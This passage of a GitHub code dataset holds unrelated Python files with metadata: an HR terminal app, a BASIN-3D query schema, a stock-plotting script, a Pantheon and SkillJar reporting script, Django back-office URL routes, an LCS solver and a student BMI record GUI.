Employee\\n'\r\n 'b. Promote Employee\\n'\r\n 'c. Delete Employee\\n'\r\n 'd. Search Another Employee\\n'\r\n 'e. Back to homepage!\\n')\r\n ch=input('Choose an action: ')\r\n if ch in ('a','A'):\r\n con = input('Are you sure you want to edit this employee? (Y/N) ')\r\n if con in ('y', 'Y'):\r\n # TUPPLE data TO GEMIZOYME ME DEDOMENA POY DINEI O XRHSTHS\r\n data = ()\r\n name = input('Name : ')\r\n email = input('Email : ')\r\n phone = input('Phone Number : ')\r\n address = input('Address : ')\r\n salary = input('Salary : ')\r\n data = (name, email, phone, address, salary, id_emp)\r\n\r\n qry = \"update personel \" \\\r\n \"set name=%s, email=%s, phone=%s, address=%s, salary=%s \" \\\r\n \"where id_emp = %s;\"\r\n\r\n curs.execute(qry, data)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY EDITED!!\\n')\r\n else:\r\n print('EDIT CANCELED!!\\n')\r\n elif ch in ('b','B'):\r\n con = input('Are you sure you want to promote this employee (Y/N) ')\r\n if con in ('y', 'Y'):\r\n data = ()\r\n salary = input('Salary : ')\r\n data = (salary, id_emp)\r\n\r\n qry = \"update personel \" \\\r\n \"set salary=%s \" \\\r\n \"where id_emp = %s;\"\r\n\r\n curs.execute(qry, data)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY PROMOTED!!\\n')\r\n else:\r\n print('PROMOTION CANCELED!!\\n')\r\n elif ch in ('c','C'):\r\n con = input('Are you sure you want to DELETE this employee (Y/N) ')\r\n if con in ('y', 'Y'):\r\n data = (id_emp,)\r\n\r\n qry = \"delete from personel \" \\\r\n \"where id_emp = %s;\"\r\n\r\n curs.execute(qry, data)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY DELETED!!\\n')\r\n else:\r\n print('DELETE CANCELED!!\\n')\r\n elif ch in ('d','D'):\r\n search()\r\n elif ch in ('e','E'):\r\n print('RETURNING TO HOMEPAGE!\\n')\r\n else:\r\n print('WRONG INPUT. BACK TO HOMEPAGE.\\n')\r\n\r\n else:\r\n print('The ID you provided does not match any of our employees!\\n')\r\n\r\n\r\n#ARXIKH SELIDA TOY PROGRAMMATOS\r\nch=0\r\nprint('**WELCOME TO OUR HR MANAGEMENT TERMINAL**\\n')\r\n\r\n#LOOP GIA NA MHN XREIAZETAI O XRHSTHS NA TREXEI TO PROGRAMMA APO THN ARXH KA8E FORA POY EKTELEI MIA PRAKSH EPITYXWS\r\nwhile ch !=7:\r\n print('***** HOME-PAGE *****\\n')\r\n print('You can use this terminal to do the following actions:\\n\\n'\r\n '1. Register New Employee\\n'\r\n '2. View Employee Data\\n'\r\n '3. Edit Employee Data\\n'\r\n '4. Promote Employee\\n'\r\n '5. Delete Employee\\n'\r\n '6. 
Search Employee\\n'\r\n '7. EXIT\\n')\r\n ch=int(input('Please type the number of the desired action: \\n'))\r\n\r\n if ch == 1 :\r\n register()\r\n elif ch == 2 :\r\n view()\r\n\r\n elif ch == 3 :\r\n edit()\r\n\r\n elif ch == 4 :\r\n promote()\r\n\r\n elif ch == 5 :\r\n delete()\r\n\r\n elif ch == 6 :\r\n search()\r\n elif ch == 7 :\r\n print('EXITING...')\r\n else:\r\n print('WRONG INPUT. TRY AGAIN!\\n\\n')","repo_name":"vmilon/hr_app","sub_path":"vasileios_mylonas.py","file_name":"vasileios_mylonas.py","file_ext":"py","file_size_in_byte":11267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7236057493","text":"\"\"\"\n\n.. currentmodule:: basin3d.core.schema.query\n\n:platform: Unix, Mac\n:synopsis: BASIN-3D Query Schema\n:module author: Val Hendrix \n:module author: Danielle Svehla Christianson \n\n.. contents:: Contents\n :local:\n :backlinks: top\n\n\n\"\"\"\nfrom datetime import date\nfrom typing import ClassVar, List, Optional, Union\n\nfrom pydantic import BaseModel, Field\n\nfrom basin3d.core.schema.enum import FeatureTypeEnum, MessageLevelEnum, ResultQualityEnum, SamplingMediumEnum, StatisticEnum, AggregationDurationEnum\n\n\ndef _to_camelcase(string) -> str:\n \"\"\"\n Change provided string with underscores to Javascript camelcase\n (e.g. to_camelcase -> toCamelcase)\n :param string: The string to transform\n :return:\n \"\"\"\n return \"\".join(i and s[0].upper() + s[1:] or s for i, s in enumerate(string.split(\"_\")))\n\n\nclass QueryBase(BaseModel):\n \"\"\" Query Base Class. This sets `QueryBase.Config` defaults and processes incoming datasource ids\"\"\"\n\n datasource: Optional[List[str]] = Field(title=\"Datasource Identifiers\",\n description=\"List of datasource identifiers to query by.\")\n\n id: Optional[str] = Field(title=\"Identifier\", description=\"The unique identifier for the desired object\")\n\n is_valid_translated_query: Union[None, bool] = Field(default=None, title=\"Valid translated query\",\n description=\"Indicates whether the translated query is valid: None = is not translated\")\n\n def __init__(self, **data):\n \"\"\"\n Custom constructor to modify datasource string to list, if necessary\n\n :param data: the data\n \"\"\"\n if \"datasource\" in data and data['datasource']:\n data['datasource'] = isinstance(data['datasource'], str) and list([data['datasource']]) or data[\n 'datasource']\n super().__init__(**data)\n\n class Config:\n # output fields to camelcase\n alias_generator = _to_camelcase\n # whether an aliased field may be populated by its name as given by the model attribute\n # (allows bot camelcase and underscore fields)\n allow_population_by_field_name = True\n # Instead of using enum class use enum value (string object)\n use_enum_values = True\n # Validate all fields when initialized\n validate_all = True\n\n # Get the query fields that have mappings. Subclasses may overwrite this base function\n mapped_fields: ClassVar[List[str]] = []\n\n # Get the query fields that have prefixes. 
Subclasses may overwrite this base function\n    prefixed_fields: ClassVar[List[str]] = []\n\n\nclass QueryMonitoringFeature(QueryBase):\n    \"\"\"Query :class:`basin3d.core.models.MonitoringFeature`\"\"\"\n    # optional but id (QueryBase) is required to query by named monitoring feature\n    feature_type: Optional[FeatureTypeEnum] = Field(title=\"Feature Type\",\n                                                    description=\"Filter results by the specified feature type.\")\n    monitoring_feature: Optional[List[str]] = Field(title=\"Monitoring Features\",\n                                                    description=\"Filter by the list of monitoring feature identifiers\")\n    parent_feature: Optional[List[str]] = Field(title=\"Parent Monitoring Features\",\n                                                description=\"Filter by the list of parent monitoring feature identifiers\")\n\n    def __init__(self, **data):\n        \"\"\"\n        Custom constructor to modify feature_type strings to uppercase\n\n        :param data: the data\n        \"\"\"\n\n        # convert strings to lists for some fields; the camel case is for Pydantic validation\n        for field in [\"monitoring_feature\", \"monitoringFeature\", \"parent_feature\", \"parentFeature\"]:\n            if field in data and data[field] and isinstance(data[field], str):\n                data[field] = list([data[field]])\n\n        # To upper for feature type\n        for field in [\"featureType\", \"feature_type\"]:\n            if field in data and data[field]:\n                data[field] = isinstance(data[field], str) and data[field].upper() or data[field]\n        super().__init__(**data)\n\n    prefixed_fields: ClassVar[List[str]] = ['id', 'monitoring_feature', 'parent_feature']\n\n\nclass QueryMeasurementTimeseriesTVP(QueryBase):\n    \"\"\"Query :class:`basin3d.core.models.MeasurementTimeseriesTVP`\"\"\"\n    # required\n    monitoring_feature: List[str] = Field(min_items=1, title=\"Monitoring Features\",\n                                          description=\"Filter by the list of monitoring feature identifiers\")\n    observed_property: List[str] = Field(min_items=1, title=\"Observed Property Variables\",\n                                         description=\"Filter by the list of observed property variables\")\n    start_date: date = Field(title=\"Start Date\", description=\"Filter by data taken on or after the start date\")\n\n    # optional\n    aggregation_duration: AggregationDurationEnum = Field(default='DAY', title=\"Aggregation Duration\",\n                                                          description=\"Filter by the specified aggregation duration or time frequency\")\n    end_date: Optional[date] = Field(title=\"End Date\", description=\"Filter by data taken on or before the end date\")\n    statistic: Optional[List[StatisticEnum]] = Field(title=\"Statistic\",\n                                                     description=\"Return specified statistics, if they exist.\")\n    result_quality: Optional[List[ResultQualityEnum]] = Field(title=\"Result Quality\",\n                                                              description=\"Filter by specified result qualities\")\n    sampling_medium: Optional[List[SamplingMediumEnum]] = Field(title=\"Sampling Medium\",\n                                                                description=\"Filter results by specified sampling medium\")\n\n    def __init__(self, **data):\n        \"\"\"\n        Custom constructor\n\n        :param data: the data\n        \"\"\"\n\n        # convert strings to lists for some fields; the camel case is for Pydantic validation (don't delete)\n        for field in [\"monitoring_feature\", \"monitoringFeature\", \"observed_property\", \"observedProperty\",\n                      \"statistic\", \"result_quality\", \"sampling_medium\"]:\n            if field in data and data[field] and isinstance(data[field], str):\n                data[field] = list([data[field]])\n\n        data = self.__validate__(**data)\n\n        super().__init__(**data)\n\n    @staticmethod\n    def __validate__(**data):\n        \"\"\"\n        Validate\n        :return:\n        \"\"\"\n        if 'aggregation_duration' in data and data['aggregation_duration'] is None:\n            del data['aggregation_duration']\n        
return data\n\n    # observed_property_variables is first b/c it is most likely to have compound mappings.\n    # ToDo: check how order may affect translation (see core/synthesis)\n    mapped_fields: ClassVar[List[str]] = ['observed_property', 'aggregation_duration', 'statistic', 'result_quality', 'sampling_medium']\n    prefixed_fields: ClassVar[List[str]] = ['monitoring_feature']\n\n\nclass SynthesisMessage(BaseModel):\n    \"\"\"BASIN-3D Synthesis Message \"\"\"\n\n    msg: str = Field(title=\"Msg\", description=\"The synthesis message \")\n    level: MessageLevelEnum = Field(title=\"Level\", description=\"The severity level of the message.\")\n    where: Optional[List[str]] = Field([], title=\"Where\",\n                                       description=\"The place in BASIN-3D where the synthesis message was generated \"\n                                                   \"from. \"\n                                                   \"If empty or null, this is a BASIN-3D error, the first item in \"\n                                                   \"the list is the datasource id, \"\n                                                   \"the second should be the synthesis model.\")\n\n    class Config:\n        # output fields to camelcase\n        alias_generator = _to_camelcase\n        # whether an aliased field may be populated by its name as given by the model attribute\n        # (allows both camelcase and underscore fields)\n        allow_population_by_field_name = True\n        # Instead of using enum class use enum value (string object)\n        use_enum_values = True\n        # Validate all fields when initialized\n        validate_all = True\n\n\nclass SynthesisResponse(BaseModel):\n    \"\"\"BASIN-3D Synthesis Response \"\"\"\n\n    query: QueryBase = Field(title=\"Query\", description=\"The original query for the current response\")\n    data: Optional[Union[object, List[object]]] = Field(title=\"Data\",\n                                                        description=\"The data for the current response. Empty if provided \"\n                                                                    \"via Iterator.\")\n    messages: List[Optional[SynthesisMessage]] = Field([], title=\"Messages\",\n                                                       description=\"The synthesis messages for this response\")\n\n    class Config:\n        # output fields to camelcase\n        alias_generator = _to_camelcase\n        # whether an aliased field may be populated by its name as given by the model attribute\n        # (allows both camelcase and underscore fields)\n        allow_population_by_field_name = True\n        # Instead of using enum class use enum value (string object)\n        use_enum_values = True\n        # Validate all fields when initialized\n        validate_all = True\n        # Allows generic object to be used for data field\n        arbitrary_types_allowed = True\n","repo_name":"BASIN-3D/basin3d","sub_path":"basin3d/core/schema/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":9621,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"27"} +{"seq_id":"26644388744","text":"import urllib.request, json \nimport matplotlib.pyplot as plt\nimport numpy as np\nxpoints=[]\nypoints=[]\nwith urllib.request.urlopen(\"http://54.188.231.51:5000/Stock_Price_Time_Series_Weekly/?ticker=ABB.BSE&start_date=2020-10-01&end_date=2022-10-01\") as url:\n    data = json.load(url)\n    #print(data)\n    #print(data[0]['adjustedclose'])\n    for i in data:\n        xpoints.append(i['tradedate']) \n        ypoints.append(i['adjustedclose']) \nxpts=xpoints[::-1]\nypts=ypoints[::-1]\nplt.plot(xpts, ypts)\nplt.title(\"WEEKLY TIME SERIES\")\nplt.xlabel(\"Date\")\nplt.ylabel(\"Closing Price\")\nplt.tick_params(axis='x', which='major', labelsize=0.01)\nplt.show()\n\n","repo_name":"JuhiKrishnamurthy/Stock_Screener","sub_path":"BACKEND/urljsontry.py","file_name":"urljsontry.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"35120820760","text":"import sys\nimport os\nimport subprocess\nimport datetime\nimport dateutil.parser\nimport json\nimport re\nimport urllib.parse\nimport time\n\nimport mechanize\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\n\nfrom http.cookiejar import LWPCookieJar\nimport requests\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\n## .env variables\nterminus_email = os.getenv('TR_EMAIL')\nskilljar_pass = os.getenv('SJ_PASWD')\nskilljar_email = os.getenv('SJ_EMAIL')\nexcluded_uuids = os.getenv('UUIDS').splitlines()\n\n###\n# Terminus Authentication\n###\n\n## Check validity of an email address\ndef is_valid_email(email):\n # Regular expression pattern for a valid email address\n pattern = r\"^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$\"\n return re.match(pattern, email) is not None\n\n## Terminus authority verify\ncheck_user = subprocess.Popen(\"terminus whoami\", shell=True, stdout=subprocess.PIPE)\ncheck_user_return = check_user.stdout.read()\n\n## Terminus Auth:Login if not logged in\nif is_valid_email(check_user_return.decode()):\n login = subprocess.Popen(\"terminus auth:login --email=\"+terminus_email, shell=True, stdout=subprocess.PIPE)\n login_result= login.stdout.read()\n\n###\n# Set SkillJar session for scraping\n###\n\n## Create Session\ns = requests.Session()\ncookie_file = '/tmp/cookies'\njar = LWPCookieJar(cookie_file)\n\nbrowser = mechanize.Browser()\nbrowser.set_handle_robots(False)\nbrowser.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]\nbrowser.set_cookiejar(jar)\n\nbrowser.open(\"https://dashboard.skilljar.com/login\")\n\nbrowser.select_form(nr=0)\nbrowser.form['email'] = skilljar_email\nbrowser.form['password1'] = skilljar_pass\nbrowser.submit()\n\n\n###\n# Terminus Loop\n###\n\n## Create an array organizations where member\nget_orgs = subprocess.Popen(\"terminus org:list --fields=ID,Name,Label --format=csv\", shell=True, stdout=subprocess.PIPE)\nget_orgs_return = get_orgs.stdout.read()\n\n## Iterate through organization array\nfor org_line in get_orgs_return.splitlines():\n org = org_line.decode(\"utf-8\").split(',')\n\n # check if organization is exluded\n if (org[0] not in excluded_uuids):\n if (org[1] != \"Name\"):\n \n # Assign ID, Name, Label\n orgID = org[0]\n orgName = org[1]\n orgLabel = org[2]\n\n # Markup formatting\n print('Weekly Review for *'+orgLabel.strip('\\\"')+'* \\n')\n print('*LMS*')\n\n lms_count = 0\n # Users within Org\n get_users = subprocess.Popen(\"terminus org:people:list \"+ orgID + \" --field=Email --format=csv\", shell=True, stdout=subprocess.PIPE)\n get_users_return = get_users.stdout.read()\n for org_user in get_users_return.splitlines():\n user = org_user.decode(\"utf-8\")\n domain = user.split('@')[1] \n\n ## Exclude members who are Pantheors\n if not (\"pantheon\") in domain:\n # print(user)\n browser.open(\"https://dashboard.skilljar.com/analytics/students/ajax-data?draw=1&start=0&length=25&skip_total_count=true&order[0][column]=5&order[0][dir]=desc&signed_up_at=all&latest_activity=all&search[value]=\"+urllib.parse.quote_plus(user)+\"&_=1668790286383\")\n response = browser.response().read().decode('utf-8')\n r = json.loads(response)\n\n for mem in r['data']:\n if (mem['registrations']['display'] > 0):\n print(user)\n lms = user+\"\\n\"\n latest_activity = re.sub('<[^<]+?>', '', mem['latest_activity']['display'])\n print(\"* Registrations: \"+str(mem['registrations']['display']))\n print(\"* Course 
Completions: \"+str(mem['course_completions']['display']))\n print(\"* Latest Activity: \"+latest_activity)\n lms_count = lms_count + 1\n time.sleep(3)\n\n if (lms_count < 1):\n print(\"No org members registered in LMS\")\n\n # Site Loop within Org\n get_sites = subprocess.Popen(\"terminus org:site:list \"+ orgID + \" --fields=ID,Name,\\\"Is Frozen?\\\" --format=csv\", shell=True, stdout=subprocess.PIPE)\n get_sites_return = get_sites.stdout.read()\n \n site_count = len(get_sites_return.splitlines()) - 1\n \n if (site_count == 0):\n print(\"No Sites\")\n else:\n print(str(site_count)+\" Sites in org\")\n\n for site_line in get_sites_return.splitlines():\n site = site_line.decode(\"utf-8\").split(',')\n if (site[1] != \"Name\"):\n \n # Assign ID, Name, Frozen\n siteID = site[0]\n siteName = site[1]\n frozen = site[2]\n\n # If NOT Frozen\n if (frozen == \"false\"):\n\n # Env loop envs within site\n get_envs = subprocess.Popen(\"terminus env:info \"+ siteName+\".live\" + \" --field=Initialized\", shell=True, stdout=subprocess.PIPE)\n get_envs_return = get_envs.stdout.read()\n\n # Find Live env\n if b'1\\n' in get_envs_return:\n print(f\"Live Environment: {site[1]}\")\n\n print(\"=======================\")\n\n","repo_name":"ericmichalsen/onboarding_app","sub_path":"weekly_check.py","file_name":"weekly_check.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"922108328","text":"from django.urls import path\n\nfrom apps.back_office.views import interview\nfrom apps.back_office.views.news import NewsListAPIView, NewsDestroyAPIView, NewsCreateAPIView, NewsUpdateAPIView, \\\n NewsRetrieveAPIView\nfrom apps.back_office.views.photo_report import PhotoReportCreateAPIView, PhotoReportDetailAPIView, \\\n PhotoReportUpdateAPIView, PhotoReportDestroyAPIView\nfrom apps.back_office.views.podcast import PodcastDestroyAPIView, PodcastRetrieveAPIView, PodcastUpdateAPIView, \\\n PodcastCreateAPIView, PodcastListAPIView\n\nfrom apps.back_office.views.tag import (\n TagCreateAPIView,\n TagDestroyAPIView,\n TagUpdateAPIView,\n)\nfrom apps.back_office.views.profile import (\n UserProfileAPIView,\n ProfileUpdateView,\n UserUpdateView,\n ProfileListView,\n ProfileDestroyAPIView,\n)\nfrom apps.photoreport.views import PhotoReportListAPIView\n\nurlpatterns = [\n # interview Urls\n path(\"interview/list/\", interview.InterviewListAPIView.as_view(), name=\"back_interview_list\"),\n path(\"interview/create/\", interview.InterviewCreateAPIView.as_view(), name=\"back_interview_create\"),\n path(\"interview/update//\", interview.InterviewUpdateAPIView.as_view(), name=\"back_interview_update\"),\n path(\"interview/delete//\", interview.InterviewDestroyAPIView.as_view(), name=\"back_interview_delete\"),\n path(\"interview/detail//\", interview.InterviewRetrieveAPIView.as_view(), name=\"back_interview_detail\"),\n\n # tag Urls\n path(\"tag/create/\", TagCreateAPIView.as_view(), name=\"back_tag_create\"),\n path(\"tag/update//\", TagUpdateAPIView.as_view(), name=\"back_tag_update\"),\n path(\"tag/delete//\", TagDestroyAPIView.as_view(), name=\"back_tag_delete\"),\n\n # user Url\n path(\"user/edit//\", UserUpdateView.as_view(), name=\"back_user_edit\"),\n\n # profile Urls\n path(\"profile/list/\", ProfileListView.as_view(), name=\"back_profile_list\"),\n path(\"profile/detail/\", UserProfileAPIView.as_view(), name=\"back_profile_detail\"),\n path(\"profile/edit//\", ProfileUpdateView.as_view(), name=\"back_profile_update\"),\n 
path(\"profile/delete/\", ProfileDestroyAPIView.as_view(), name=\"back_profile_delete\"),\n\n # news Urls\n path(\"news/list/\", NewsListAPIView.as_view(), name=\"back_news_list\"),\n path(\"news/create/\", NewsCreateAPIView.as_view(), name=\"back_news_create \"),\n path(\"news/update//\", NewsUpdateAPIView.as_view(), name=\"back_news_update\"),\n path(\"news/delete//\", NewsDestroyAPIView.as_view(), name=\"back_news_delete\"),\n path(\"news/detail//\", NewsRetrieveAPIView.as_view(), name=\"back_news_detail\"),\n\n # photo report Urls\n path(\"photo-report/list/\", PhotoReportListAPIView.as_view(), name=\"back_photo_report_list\"),\n path(\"photo-report/create/\", PhotoReportCreateAPIView.as_view(), name=\"back_photo_report_create \"),\n path(\"photo-report/update//\", PhotoReportUpdateAPIView.as_view(), name=\"back_photo_report_update\"),\n path(\"photo-report/detail//\", PhotoReportDetailAPIView.as_view(), name=\"back_photo_report_detail\"),\n path(\"photo-report/delete//\", PhotoReportDestroyAPIView.as_view(), name=\"back_photo_report_delete\"),\n\n # podcast Urls\n path(\"podcast/list/\", PodcastListAPIView.as_view(), name=\"back_podcast_list\"),\n path(\"podcast/create/\", PodcastCreateAPIView.as_view(), name=\"back_podcast_create \"),\n path(\"podcast/update//\", PodcastUpdateAPIView.as_view(), name=\"back_podcast_update\"),\n path(\"podcast/detail//\", PodcastRetrieveAPIView.as_view(), name=\"back_podcast_detail\"),\n path(\"podcast/delete//\", PodcastDestroyAPIView.as_view(), name=\"back_podcast_delete\"),\n]\n","repo_name":"Ilyosbek07/UzNews","sub_path":"apps/back_office/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14579208914","text":"\nclass Solution:\n def solve(self, str1, str2):\n\n from functools import lru_cache\n @lru_cache(None)\n def dp(m, n):\n res = set()\n if m == 0 or n == 0:\n return res\n if str1[m-1] == str2[n-1]:\n data = dp(m-1,n-1)\n if data:\n for i in data:\n res.add(i + str1[m-1])\n else:\n res.add(str1[m-1])\n else:\n max_m = max((len(i) for i in dp(m-1, n)), default=0)\n max_n = max((len(i) for i in dp(m, n-1)), default=0)\n if max_m >= max_n:\n res = dp(m-1, n)\n if max_n >= max_m:\n tmp = dp(m, n-1)\n res.update(tmp)\n return res\n \n return dp(len(str1), len(str2))\n\nprint(Solution().solve(\"AGTGATG\", \"GTTAG\"))\nprint(Solution().solve(\"AATCC\", \"ACACG\"))\nprint(Solution().solve(\"ABCBDAB\", \"BDCABA\"))\n","repo_name":"duyquang6/ds-algo-pratice","sub_path":"dp/print_longest_common_subseq.py","file_name":"print_longest_common_subseq.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30219503756","text":"#hw6.py\n#Student Health Record System\n#Derek Yang\n#63118832\n\n\nimport math\nfrom graphics import *\n\n\ndef checkClickPosition(click):\n# TODO: click is the Point from the user mouse click\n# The function should return the button number selected\n x=click.getX()\n y=click.getY()\n if x>=44 and x<=56 and y<=37 and y>=33:\n op=1\n return op\n elif x>=44 and x<=56 and y<=32 and y>=28:\n op=2\n return op\n elif x>=44 and x<=56 and y<=27 and y>=23:\n op=3\n return op\n elif x>=44 and x<=56 and y<=22 and y>=18:\n op=4\n return op\n elif x>=44 and x<=56 and y<=17 and y>=13:\n op=5\n return op\n elif x>=44 and x<=56 and y<=7 and y>=3:\n op=6\n return op\n else:\n op=7\n return op\n\ndef convertToBMI(weight, 
height):\n bmi = int(weight) / (int(height) *int(height)) * 703\n return bmi\n\ndef bmiResult(bmi):\n#TODO: Check what BMI category the student is using bmi\n if bmi<=18.5:\n bmiresult=\"Underweight\"\n elif bmi>=18.5 and bmi<=24.9:\n bmiresult=\"Normalweight\"\n elif bmi>=25 and bmi<=29.9:\n bmiresult=\"Overweight\"\n else:\n bmiresult=\"Obese\"\n return bmiresult\n\ndef targetWeight(bmi, weight, height):\n optimalweight =0\n if bmi<= 18.5 or bmi>25:\n optimalbmi = (18.5+24.9)/2\n #TODO:\n #Calculate the optimal weight using optimalbmi, height and weight\n optimalweight=(optimalbmi*height*height)/703\n return int(optimalweight)\n else:\n return weight\n\n\ndef main():\n win = GraphWin(\"Student Health Record System\", 600, 400)\n win.setCoords(0.0, 0.0, 60, 40)\n textFn = Text(Point(6, 35), \"File Name:\")\n textFn.draw(win)\n textId = Text(Point(6, 31), \"Student ID:\")\n textId.draw(win)\n textName = Text(Point(6, 27), \"Student Name:\")\n textName.draw(win)\n textWeight = Text(Point(6, 23), \"Weight(Lbs):\")\n textWeight.draw(win)\n textHeight = Text(Point(6, 19), \"Height(Inches):\")\n textHeight.draw(win)\n bmiLetter = Text(Point(6, 15), \"BMI Category:\")\n bmiLetter.draw(win)\n\n \n textButtonOpen = Text(Point(50, 35), \"Open\")\n textButtonOpen.draw(win)\n textButtonAdd = Text(Point(50, 30), \"Find Student\")\n textButtonAdd.draw(win)\n textButtonFind = Text(Point(50, 25), \"Add Student\")\n textButtonFind.draw(win)\n textButtonSave = Text(Point(50, 20), \"Change Weight\")\n textButtonSave.draw(win)\n textButtonTarget = Text(Point(50, 15), \"Advise Weight\")\n textButtonTarget.draw(win)\n textButtonQuit = Text(Point(50, 5), \"Quit\")\n textButtonQuit.draw(win)\n textMessage = Text(Point(20, 5), \"Enter the health record file name and click Open.\")\n textMessage.setTextColor(\"Blue\")\n textMessage.draw(win)\n \n buttonOpen = Rectangle(Point(56,33),Point(44,37))\n buttonOpen.draw(win)\n buttonFind = Rectangle(Point(56,28),Point(44,32))\n buttonFind.draw(win)\n buttonAdd = Rectangle(Point(56,27), Point(44,23))\n buttonAdd.draw(win)\n buttonSave = Rectangle(Point(56,22), Point(44,18))\n buttonSave.draw(win)\n buttonTarget = Rectangle(Point(56,17), Point(44,13))\n buttonTarget.draw(win)\n buttonQuit = Rectangle(Point(56,7), Point(44,3))\n buttonQuit.draw(win)\n \n fnInput = Entry(Point(24, 35), 25)\n fnInput.draw(win)\n idInput = Entry(Point(24, 31),25)\n idInput.draw(win)\n nameInput = Entry(Point(24,27),25)\n nameInput.draw(win)\n weightInput = Entry(Point(24,23),25)\n weightInput.draw(win)\n heightInput = Entry(Point(24,19),25)\n heightInput.draw(win)\n bmiTextInput = Entry(Point(24, 15), 25)\n bmiTextInput.draw(win)\n\n #TODO: create all lists to be used in the program\n id_lst=[]\n name_lst=[]\n weight_lst=[]\n height_lst=[]\n opened=0\n \n while True: # This is the main loop\n click = win.getMouse()\n op = checkClickPosition(click)\n if op == 1: #click on Open\n #Operations for opening a file, read info into lists and close the file\n fn=fnInput.getText()\n filein=open(fn,'r')\n read=filein.readlines()\n length=len(read)\n filein.seek(0)\n for i in range(length):\n lines=filein.readline()\n if lines==\"\\n\":\n pass\n else:\n linesplit=lines.split(\"\\t\")\n id_lst.append(linesplit[0])\n name_lst.append(linesplit[1])\n weight_lst.append(linesplit[2])\n height_lst.append(linesplit[3])\n opened=1 \n textMessage.setText(\"File {0} opened\".format(fn)) \n \n elif op == 2: #click on Find\n #Operations for Finding a Student\n idnum=idInput.getText()\n tf=idnum in id_lst\n if 
opened==1:\n if tf==True: #If there exists a student with the Student ID\n pos=id_lst.index(idnum)\n nameInput.setText(name_lst[pos])\n weightInput.setText(weight_lst[pos])\n heightInput.setText(height_lst[pos])\n bmi=convertToBMI(int(weight_lst[pos]),int(height_lst[pos]))\n bmiresult=bmiResult(bmi)\n bmiTextInput.setText(bmiresult)\n textMessage.setText(\"Student with ID{0} found in the system\".format(idnum))\n else: #If there is no student with the student ID\n textMessage.setText(\"Student with ID{0} does not exist\".format(idnum))\n nameInput.setText(\"\")\n weightInput.setText(\"\")\n heightInput.setText(\"\")\n bmiTextInput.setText(\"\")\n else:\n textMessage.setText(\"You have not opened a file yet\")\n pass\n \n elif op == 3: #click on Add\n #Operations for Adding a Student\n name=nameInput.getText()\n idnum=idInput.getText()\n weight=weightInput.getText()\n height=heightInput.getText()\n if opened==1:\n if idnum in id_lst: #If there exists a student with the student ID \n textMessage.setText(\"Student ID already exist in the system\")\n else: #If there is no student with the student ID\n if name==\"\" or weight==\"\" or height==\"\":\n textMessage.setText(\"Information for Student{0} is missing\".format(idnum))\n else: \n id_lst.append(idnum)\n name_lst.append(name)\n weight_lst.append(weight)\n height_lst.append(height)\n textMessage.setText(\"Student Information has been added\")\n else:\n textMessage.setText(\"You have not opened a file yet\")\n pass\n \n elif op == 4: #click on Change Weight\n #Operations for changing the weight of a student\n idnum=idInput.getText()\n tf=idnum in id_lst\n weight=weightInput.getText()\n if opened==1:\n if tf==True : #If there exists a student with the student ID, change weight\n pos=id_lst.index(idnum)\n weight_lst[pos]=weight\n textMessage.setText(\"Student's Weight has been changed\")\n else: #If there is no student with the student ID\n textMessage.setText(\"Student with ID{0} does not exist\".format(idnum))\n else:\n textMessage.setText(\"You have not opened a file yet\")\n pass\n \n elif op == 5: #click on Advise Weight\n #Operations for checking a Student's weight\n idnum=idInput.getText()\n tf=idnum in id_lst\n if opened==1:\n if tf==True: # There exists a student with the given student ID\n pos=id_lst.index(idnum)\n bmi=convertToBMI(weight_lst[pos],height_lst[pos])\n bmiresult=bmiResult(bmi)\n if bmiresult==\"Normalweight\": #If the student is in the right weight range\n textMessage.setText(\"Student's target weight is {0}lbs\".format(weight_lst[pos]))\n else: #If the student is underweight or overweight or obese\n weightx=eval(weight_lst[pos])\n heightx=eval(height_lst[pos])\n targetweight=targetWeight(bmi,weightx,heightx)\n textMessage.setText(\"Student{0}'s target weight is {1}lbs\".format(id_lst[pos],targetweight))\n else: #If there is no student with the student ID\n textMessage.setText(\"Student with ID{0} does not exist\".format(idnum))\n else:\n textMessage.setText(\"You have not opened a file yet\")\n pass\n \n elif op == 6: #click on Quit\n #Writing the lists to the file and get out of the main loop\n if opened==1:\n filein.close()\n outfile=open(fn,'w')\n lp=len(id_lst)\n for i in range(lp):\n outfile.write(id_lst[i])\n outfile.write(\"\\t\")\n outfile.write(name_lst[i])\n outfile.write(\"\\t\")\n outfile.write(weight_lst[i])\n outfile.write(\"\\t\")\n outfile.write(height_lst[i])\n outfile.write(\"\\n\")\n outfile.close()\n break\n else:\n break\n else:\n # possible error conditions\n pass\n \n 
